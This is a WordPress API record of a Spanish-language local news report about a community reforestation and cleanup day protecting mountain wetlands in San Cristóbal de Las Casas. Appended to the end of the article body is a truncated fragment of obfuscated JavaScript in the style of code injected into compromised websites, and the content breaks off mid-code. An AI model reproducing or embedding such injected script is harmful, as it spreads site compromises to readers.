{"id":24120,"date":"2025-09-22T04:08:44","date_gmt":"2025-09-22T04:08:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24120"},"modified":"2025-09-22T04:08:45","modified_gmt":"2025-09-22T04:08:45","slug":"vecinos-de-las-minas-impulsan-jornada-de-reforestacion-y-cuidado-ambiental","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24120","title":{"rendered":"Vecinos de Las Minas impulsan jornada de reforestaci\u00f3n y cuidado ambiental"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"24122\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345515-1024x768.jpg\" alt=\"\" class=\"wp-image-24122\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345515-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345515-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345515-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345515.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"461\" data-id=\"24121\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345514-1024x461.jpg\" alt=\"\" class=\"wp-image-24121\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345514-1024x461.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345514-300x135.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345514-768x346.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345514.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>21 de septiembre del 2025. San Crist\u00f3bal de Las Casas, Chis.- Habitantes de la colonia Las Minas llevaron a cabo una jornada comunitaria dedicada a la reforestaci\u00f3n, limpieza de espacios comunes y recolecci\u00f3n de residuos s\u00f3lidos, como parte de las acciones de restauraci\u00f3n ambiental en la zona sur de la ciudad.<\/p>\n\n\n\n<p>La iniciativa forma parte de los esfuerzos ciudadanos que se enmarcan en el Plan Nacional H\u00eddrico 2025, cuyo prop\u00f3sito es mitigar los impactos ambientales, garantizar el acceso al agua como derecho humano, impulsar el saneamiento de r\u00edos y microcuencas, adem\u00e1s de fomentar la participaci\u00f3n ciudadana y la rendici\u00f3n de cuentas.<\/p>\n\n\n\n<p>Durante m\u00e1s de una d\u00e9cada, los Consejos de Participaci\u00f3n y Colaboraci\u00f3n Vecinal, junto a guardianas, guardianes y activistas ambientales, han trabajado en la protecci\u00f3n de los humedales de monta\u00f1a La Kist y Mar\u00eda Eugenia. Estos ecosistemas resultan vitales para San Crist\u00f3bal de Las Casas, ya que proveen alrededor del 70 por ciento del agua que abastece a la zona sur, previenen inundaciones, albergan especies end\u00e9micas y contribuyen a la regulaci\u00f3n de la temperatura frente al cambio clim\u00e1tico.<\/p>\n\n\n\n<p>Las y los defensores ambientales recordaron que en los recientes fen\u00f3menos meteorol\u00f3gicos, los humedales han funcionado como una barrera natural que reduce da\u00f1os al patrimonio familiar y mitiga los riesgos de inundaciones en la ciudad.<\/p>\n\n\n\n<p>La actividad concluy\u00f3 con un llamado conjunto de los Consejos Vecinales, patronatos, jefes de manzana y colectivos ambientalistas a seguir fortaleciendo la organizaci\u00f3n ciudadana en defensa del agua y la biodiversidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal21 de septiembre del 2025. San Crist\u00f3bal de Las Casas, Chis.- Habitantes de la colonia Las Minas llevaron a cabo una jornada comunitaria dedicada a la reforestaci\u00f3n, limpieza de espacios comunes y recolecci\u00f3n de residuos s\u00f3lidos, como parte de las acciones de restauraci\u00f3n ambiental en la zona sur de la ciudad. La iniciativa &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24121,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-24120","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24120"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24120\/revisions"}],"predecessor-version":[{"id":24123,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24120\/revisions\/24123"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24121"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}